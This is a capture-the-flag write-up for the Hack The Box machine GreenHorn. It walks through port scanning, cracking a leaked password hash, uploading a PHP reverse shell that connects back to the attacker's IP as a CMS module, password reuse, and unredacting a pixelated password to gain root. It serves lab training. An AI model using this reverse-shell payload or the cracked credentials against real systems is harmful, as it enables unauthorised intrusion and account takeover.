Home

GreenHorn – Hack The Box – @lautarovculic

, , , ,

User.txt

First we need know what ports are open with nmap

				
					sudo nmap -sV -p- -Pn -vv -T4 10.10.11.25

Output:

				
					PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
3000/tcp open  http    syn-ack ttl 63 Golang net/http server

Let’s add the domain to our /etc/hosts file

				
					sudo echo "10.10.11.25 greenhorn.htb" | sudo tee -a /etc/hosts

We can see that in the gitea (http://greenhorn.htb:3000) there are a password

				
					GreenHorn/data/settings/pass.php
				
			
				
					<?php
$ww = 'd5443aef1b64544f3685bf112f6c405218c573c7279a831b1fe9612e3a4d770486743c5580556c0d838b51749de15530f87fb793afdcc689b6b39024d7790163';
?>

If we crack this SHA-512 we obtain the following password

				
					john --format=raw-sha512 hash.txt --wordlist=/usr/share/seclists/rockyou.txt

iloveyou1 ← Password

Then now we can login.

Then let’s create this PHP rev shell

				
					<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.24/1337 0>&1'"); ?>

And create a .zip file

				
					zip -r lautaro.zip lautaro.php

Set a nc -lnvp 1337 command

Now install it in manage module options, upload the .zip as module and the go to the file

				
					http://greenhorn.htb/data/modules/lautaro/lautaro.php

And we will get the shell.

				
					www-data@greenhorn:/home/junior$ whoami
whoami
www-data
www-data@greenhorn:/home/junior$

We can reuse the password, just make a stable shell

And then use the iloveyou1 password

				
					www-data@greenhorn:/home/junior$ su junior
Password:
junior@greenhorn:~$ cat user.txt
fd6732949************5f616cbe5
junior@greenhorn:~$

Root.txt

Now we are junior, then. We can see the .pdf file that say:

				
					Hello junior,
We have recently installed OpenVAS on our server to actively monitor and identify potential security
vulnerabilities. Currently, only the root user, represented by myself, has the authorization to execute
OpenVAS using the following command:
`sudo /usr/sbin/openvas`
Enter password:
As part of your familiarization with this tool, we encourage you to learn how to use OpenVAS
effectively. In the future, you will also have the capability to run OpenVAS by entering the same
command and providing your password when prompted.
Feel free to reach out if you have any questions or need further assistance.
Have a great week,

Mr. Green

The .pdf is censored in the password part. Then, we can use this tool:

https://github.com/spipm/Depix

For get the password

And then, we can found the password with the tool.

Password: sidefromsidetheothersidesidefromsidetheotherside

Then just connect as root via ssh and

				
					root@greenhorn:~# cat root.txt
91122*******a0d18579
root@greenhorn:~#

I hope you found it useful (:

Leave a Reply

Your email address will not be published. Required fields are marked *